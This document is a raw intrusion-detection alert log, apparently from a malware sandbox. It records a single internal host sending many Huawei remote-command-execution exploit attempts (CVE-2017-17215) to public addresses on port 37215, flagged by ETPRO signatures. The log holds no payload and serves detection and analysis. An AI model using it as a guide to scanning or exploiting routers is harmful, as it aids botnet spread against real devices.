                                                    07/10/24-08:26:26.589682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5520037215192.168.2.14157.126.229.236
                                                    07/10/24-08:27:17.104843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3564837215192.168.2.1441.199.123.42
                                                    07/10/24-08:26:28.754547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964237215192.168.2.1425.132.221.177
                                                    07/10/24-08:27:22.906366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5050237215192.168.2.14157.82.33.28
                                                    07/10/24-08:27:31.468333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709637215192.168.2.14157.134.210.17
                                                    07/10/24-08:27:22.861640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684637215192.168.2.14195.158.232.105
                                                    07/10/24-08:27:11.494437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442837215192.168.2.1447.112.139.106
                                                    07/10/24-08:26:20.170023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5902037215192.168.2.14197.138.50.157
                                                    07/10/24-08:27:10.660823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5318037215192.168.2.14217.178.192.130
                                                    07/10/24-08:26:36.431217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826637215192.168.2.14197.149.15.97
                                                    07/10/24-08:26:47.933430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4539237215192.168.2.14197.206.196.56
                                                    07/10/24-08:27:14.830052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5027037215192.168.2.1441.119.32.222
                                                    07/10/24-08:27:07.376838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4402837215192.168.2.1441.37.225.97
                                                    07/10/24-08:27:19.327532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739837215192.168.2.14130.47.163.75
                                                    07/10/24-08:26:11.167098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3488437215192.168.2.14157.12.119.99
                                                    07/10/24-08:27:24.880000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3851237215192.168.2.1441.159.192.237
                                                    07/10/24-08:27:17.025929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364637215192.168.2.14157.104.229.41
                                                    07/10/24-08:26:28.840131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885837215192.168.2.1441.207.185.82
                                                    07/10/24-08:26:15.863531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510437215192.168.2.14157.255.107.113
                                                    07/10/24-08:26:51.970801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077837215192.168.2.1441.167.100.246
                                                    07/10/24-08:27:23.931354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5596037215192.168.2.1459.76.201.115
                                                    07/10/24-08:26:47.900584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4451237215192.168.2.1432.146.85.200
                                                    07/10/24-08:26:33.225771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854437215192.168.2.14157.5.250.176
                                                    07/10/24-08:27:05.121645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4462037215192.168.2.14157.154.196.89
                                                    07/10/24-08:26:43.928698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157837215192.168.2.14183.192.93.193
                                                    07/10/24-08:26:41.477028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257637215192.168.2.14197.210.222.169
                                                    07/10/24-08:27:19.163941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4590237215192.168.2.1419.118.93.137
                                                    07/10/24-08:26:14.804179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599237215192.168.2.1441.83.128.65
                                                    07/10/24-08:26:11.434490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354037215192.168.2.14157.19.87.80
                                                    07/10/24-08:26:43.638396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186637215192.168.2.14197.149.74.182
                                                    07/10/24-08:26:52.009687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197837215192.168.2.1457.113.156.137
                                                    07/10/24-08:26:49.824955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3936237215192.168.2.14202.234.44.208
                                                    07/10/24-08:27:19.271475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239837215192.168.2.145.169.108.149
                                                    07/10/24-08:27:20.512534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942637215192.168.2.14218.214.26.136
                                                    07/10/24-08:26:18.037412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047637215192.168.2.14197.84.20.185
                                                    07/10/24-08:27:02.851731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309837215192.168.2.1441.78.48.213
                                                    07/10/24-08:27:19.211631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5943037215192.168.2.1441.101.100.14
                                                    07/10/24-08:26:23.279248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5835237215192.168.2.14197.230.105.29
                                                    07/10/24-08:26:29.790655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074437215192.168.2.1481.116.244.252
                                                    07/10/24-08:27:31.526577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4069037215192.168.2.1441.252.74.163
                                                    07/10/24-08:26:26.527287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275037215192.168.2.14157.197.205.157
                                                    07/10/24-08:27:19.330211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4822437215192.168.2.14141.151.94.252
                                                    07/10/24-08:27:22.758279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4154637215192.168.2.14116.74.105.179
                                                    07/10/24-08:26:29.743461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5826437215192.168.2.14157.125.98.222
                                                    07/10/24-08:26:15.859718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093437215192.168.2.14197.215.63.81
                                                    07/10/24-08:26:38.543702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4537437215192.168.2.14197.204.238.183
                                                    07/10/24-08:27:27.122921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860437215192.168.2.14208.175.150.250
                                                    07/10/24-08:26:51.983079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481437215192.168.2.14157.49.148.7
                                                    07/10/24-08:26:57.562580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590437215192.168.2.1441.92.168.92
                                                    07/10/24-08:27:23.452279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824437215192.168.2.1441.108.74.205
                                                    07/10/24-08:27:07.392725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5720237215192.168.2.14197.42.40.85
                                                    07/10/24-08:26:43.664230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559237215192.168.2.14145.229.42.49
                                                    07/10/24-08:27:14.839974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842437215192.168.2.14157.159.130.244
                                                    07/10/24-08:27:07.281765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4611437215192.168.2.14100.181.33.210
                                                    07/10/24-08:26:38.632510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663437215192.168.2.14197.206.40.58
                                                    07/10/24-08:27:27.175137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266037215192.168.2.1441.108.198.253
                                                    07/10/24-08:26:52.015024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992037215192.168.2.1441.15.41.189
                                                    07/10/24-08:26:31.048424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002637215192.168.2.1441.64.244.92
                                                    07/10/24-08:26:43.662238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629837215192.168.2.14157.225.82.169
                                                    07/10/24-08:26:13.772861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458837215192.168.2.14157.37.60.52
                                                    07/10/24-08:26:28.723729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797037215192.168.2.14106.115.105.197
                                                    07/10/24-08:26:45.656574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864437215192.168.2.14153.171.47.163
                                                    07/10/24-08:26:49.832031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6053437215192.168.2.14126.217.143.82
                                                    07/10/24-08:26:26.565464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4756837215192.168.2.14157.17.177.197
                                                    07/10/24-08:27:30.423823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519837215192.168.2.14197.163.146.192
                                                    07/10/24-08:26:11.530156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5439637215192.168.2.14197.211.79.230
                                                    07/10/24-08:26:25.491059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358637215192.168.2.14197.221.29.0
                                                    07/10/24-08:26:41.560100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048237215192.168.2.1441.214.150.221
                                                    07/10/24-08:27:05.219455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673437215192.168.2.14197.110.101.59
                                                    07/10/24-08:26:52.075080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958637215192.168.2.1441.197.23.200
                                                    07/10/24-08:26:13.851676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876837215192.168.2.14157.162.228.212
                                                    07/10/24-08:27:11.564208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614237215192.168.2.14197.15.172.175
                                                    07/10/24-08:26:23.308313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3675237215192.168.2.1441.3.54.10
                                                    07/10/24-08:26:59.776063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5439037215192.168.2.14157.230.112.138
                                                    07/10/24-08:26:23.324879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4129837215192.168.2.14193.79.142.185
                                                    07/10/24-08:27:02.843414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6055637215192.168.2.141.123.215.255
                                                    07/10/24-08:27:33.879703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090837215192.168.2.14197.155.216.155
                                                    07/10/24-08:27:07.264352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4537237215192.168.2.1453.197.142.76
                                                    07/10/24-08:26:25.505039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457637215192.168.2.1431.119.150.19
                                                    07/10/24-08:26:59.861773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300637215192.168.2.14207.168.239.204
                                                    07/10/24-08:26:45.619051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4918837215192.168.2.1441.55.0.36
                                                    07/10/24-08:27:10.636807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485637215192.168.2.1441.175.56.193
                                                    07/10/24-08:26:28.776935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4747837215192.168.2.1438.83.169.248
                                                    07/10/24-08:26:59.800330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986837215192.168.2.14157.224.40.89
                                                    07/10/24-08:26:45.646163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556437215192.168.2.1441.66.104.234
                                                    07/10/24-08:27:23.831762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812637215192.168.2.14197.253.34.218
                                                    07/10/24-08:26:20.158539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3495037215192.168.2.1482.181.218.136
                                                    07/10/24-08:27:02.970301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4002637215192.168.2.1441.115.179.141
                                                    07/10/24-08:26:52.066193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3425237215192.168.2.14197.102.240.32
                                                    07/10/24-08:26:49.770059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3443637215192.168.2.144.234.60.245
                                                    07/10/24-08:26:33.251100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249637215192.168.2.14157.77.55.52
                                                    07/10/24-08:26:31.080592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820837215192.168.2.14173.164.158.224
                                                    07/10/24-08:26:47.939278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4876237215192.168.2.1441.149.170.147
                                                    07/10/24-08:26:55.412005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297037215192.168.2.14197.45.114.172
                                                    07/10/24-08:27:28.177795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5780237215192.168.2.1441.92.249.148
                                                    07/10/24-08:26:15.838887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4677637215192.168.2.14177.95.156.252
                                                    07/10/24-08:26:18.002573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331837215192.168.2.14197.96.75.2
                                                    07/10/24-08:26:18.006085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061637215192.168.2.1436.153.122.47
                                                    07/10/24-08:27:07.371632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737637215192.168.2.14157.31.87.252
                                                    07/10/24-08:26:36.418082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834637215192.168.2.14197.103.230.240
                                                    07/10/24-08:27:22.912600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842437215192.168.2.1444.7.171.249
                                                    07/10/24-08:26:11.587668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4418837215192.168.2.14157.249.230.27
                                                    07/10/24-08:26:43.681536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249037215192.168.2.14157.206.83.222
                                                    07/10/24-08:27:23.781687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4338637215192.168.2.14157.214.176.90
                                                    07/10/24-08:27:10.595631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286237215192.168.2.14157.209.239.72
                                                    07/10/24-08:27:33.861277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525637215192.168.2.14197.138.194.139
                                                    07/10/24-08:26:25.509517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5906237215192.168.2.14135.83.52.211
                                                    07/10/24-08:26:13.739832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3676837215192.168.2.14197.91.209.27
                                                    07/10/24-08:26:15.877145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4415037215192.168.2.1441.86.110.81
                                                    07/10/24-08:26:57.650835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692237215192.168.2.14198.26.128.44
                                                    07/10/24-08:26:59.651678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376637215192.168.2.14197.203.166.2
                                                    07/10/24-08:26:25.523968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5959437215192.168.2.14151.112.56.54
                                                    07/10/24-08:27:02.894714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770237215192.168.2.14197.252.249.173
                                                    07/10/24-08:27:33.970965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934637215192.168.2.1441.131.235.175
                                                    07/10/24-08:26:13.743815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538837215192.168.2.14157.194.215.111
                                                    07/10/24-08:26:28.644111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098637215192.168.2.1441.146.192.177
                                                    07/10/24-08:26:23.328936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862837215192.168.2.14157.90.152.159
                                                    07/10/24-08:26:38.543702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598637215192.168.2.14157.68.56.69
                                                    07/10/24-08:27:27.141035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861837215192.168.2.1441.182.46.147
                                                    07/10/24-08:27:19.226208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793837215192.168.2.14197.134.211.197
                                                    07/10/24-08:26:43.829086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935837215192.168.2.14197.175.145.173
                                                    07/10/24-08:27:08.425890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319037215192.168.2.14197.71.20.28
                                                    07/10/24-08:26:59.797297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957637215192.168.2.1466.166.2.77
                                                    07/10/24-08:27:20.471536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359837215192.168.2.14197.204.165.200
                                                    07/10/24-08:27:02.857366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791037215192.168.2.1427.208.138.110
                                                    07/10/24-08:26:25.461308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158037215192.168.2.1441.71.125.234
                                                    07/10/24-08:26:14.808905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5975037215192.168.2.14197.105.243.227
                                                    07/10/24-08:26:53.186614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5683837215192.168.2.1441.247.234.80
                                                    07/10/24-08:26:17.981659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5220237215192.168.2.14197.71.105.78
                                                    07/10/24-08:26:47.889054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5813637215192.168.2.1468.7.174.182
                                                    07/10/24-08:27:11.546125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544437215192.168.2.14197.73.152.242
                                                    07/10/24-08:27:36.285342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818837215192.168.2.14157.38.253.247
                                                    07/10/24-08:26:57.640182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5292437215192.168.2.14199.43.196.51
                                                    07/10/24-08:26:52.069445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663437215192.168.2.14157.1.88.6
                                                    07/10/24-08:26:29.761571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4108237215192.168.2.14157.116.220.8
                                                    07/10/24-08:27:17.022999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3638637215192.168.2.14197.74.227.79
                                                    07/10/24-08:26:26.535495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643237215192.168.2.1441.86.103.221
                                                    07/10/24-08:26:53.198368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859637215192.168.2.1441.20.24.83
                                                    07/10/24-08:27:27.130427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5472237215192.168.2.14197.95.100.161
                                                    07/10/24-08:27:11.484903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3640837215192.168.2.14206.63.146.211
                                                    07/10/24-08:26:15.876797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4742837215192.168.2.14197.34.34.66
                                                    07/10/24-08:27:13.865761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5898637215192.168.2.1469.232.101.251
                                                    07/10/24-08:27:07.376641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3693837215192.168.2.14197.228.20.190
                                                    07/10/24-08:26:38.547817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761637215192.168.2.1441.208.58.110
                                                    07/10/24-08:26:11.565192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4477437215192.168.2.1442.22.253.147
                                                    07/10/24-08:26:48.020359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3657237215192.168.2.14197.154.27.235
                                                    07/10/24-08:26:15.868019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3789037215192.168.2.1466.94.36.210
                                                    07/10/24-08:27:17.083690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422037215192.168.2.14157.16.41.99
                                                    07/10/24-08:26:59.683298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674237215192.168.2.14118.9.88.241
                                                    07/10/24-08:26:17.942691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788637215192.168.2.1441.233.142.72
                                                    07/10/24-08:26:28.630891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362437215192.168.2.14197.222.216.72
                                                    07/10/24-08:26:36.323441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967837215192.168.2.14197.248.241.221
                                                    07/10/24-08:27:19.294251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725437215192.168.2.14197.112.150.210
                                                    07/10/24-08:27:32.590326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021037215192.168.2.1441.234.60.199
                                                    07/10/24-08:27:13.883458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322837215192.168.2.14197.190.184.31
                                                    07/10/24-08:27:34.124417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4398037215192.168.2.14157.130.189.69
                                                    07/10/24-08:27:19.308441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3318837215192.168.2.1441.63.242.247
                                                    07/10/24-08:26:15.831924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4765437215192.168.2.1475.232.208.247
                                                    07/10/24-08:26:26.600154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965037215192.168.2.14146.191.119.108
                                                    07/10/24-08:26:20.133795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4717237215192.168.2.1441.235.112.219
                                                    07/10/24-08:27:27.041240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025037215192.168.2.1479.9.85.92
                                                    07/10/24-08:26:41.566110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927437215192.168.2.14197.203.247.85
                                                    07/10/24-08:27:30.423950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3443837215192.168.2.145.99.191.132
                                                    07/10/24-08:26:15.867590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6055437215192.168.2.1441.105.120.239
                                                    07/10/24-08:27:07.262409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592637215192.168.2.1441.249.189.111
                                                    07/10/24-08:26:11.592192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469837215192.168.2.14157.171.1.11
                                                    07/10/24-08:26:28.647124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644437215192.168.2.1441.199.238.59
                                                    07/10/24-08:26:43.911091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934437215192.168.2.14157.86.142.188
                                                    07/10/24-08:27:28.149235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6024437215192.168.2.1441.61.102.235
                                                    07/10/24-08:27:14.668684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759037215192.168.2.14157.46.183.65
                                                    07/10/24-08:26:13.825094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5082837215192.168.2.14157.20.222.218
                                                    07/10/24-08:26:33.196369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318237215192.168.2.14157.253.223.163
                                                    07/10/24-08:26:14.819309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3517837215192.168.2.1414.106.148.114
                                                    07/10/24-08:26:42.394014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913837215192.168.2.14197.36.70.201
                                                    07/10/24-08:26:52.054503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3551437215192.168.2.14197.53.38.148
                                                    07/10/24-08:26:36.375796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4744837215192.168.2.14157.205.220.14
                                                    07/10/24-08:26:28.930785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5484837215192.168.2.1441.180.97.218
                                                    07/10/24-08:26:18.017676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3357837215192.168.2.14197.44.84.95
                                                    07/10/24-08:26:36.358828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578037215192.168.2.14144.246.141.224
                                                    07/10/24-08:26:29.872230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3979437215192.168.2.14157.177.188.112
                                                    07/10/24-08:27:20.460013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4030837215192.168.2.14197.115.154.254
                                                    07/10/24-08:26:22.260584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938037215192.168.2.14157.29.140.23
                                                    07/10/24-08:26:29.662574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920837215192.168.2.1446.33.82.155
                                                    07/10/24-08:27:32.569844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453637215192.168.2.1441.248.27.72
                                                    07/10/24-08:27:19.277665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4584237215192.168.2.1441.168.148.144
                                                    07/10/24-08:27:10.600336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411037215192.168.2.14157.235.227.108
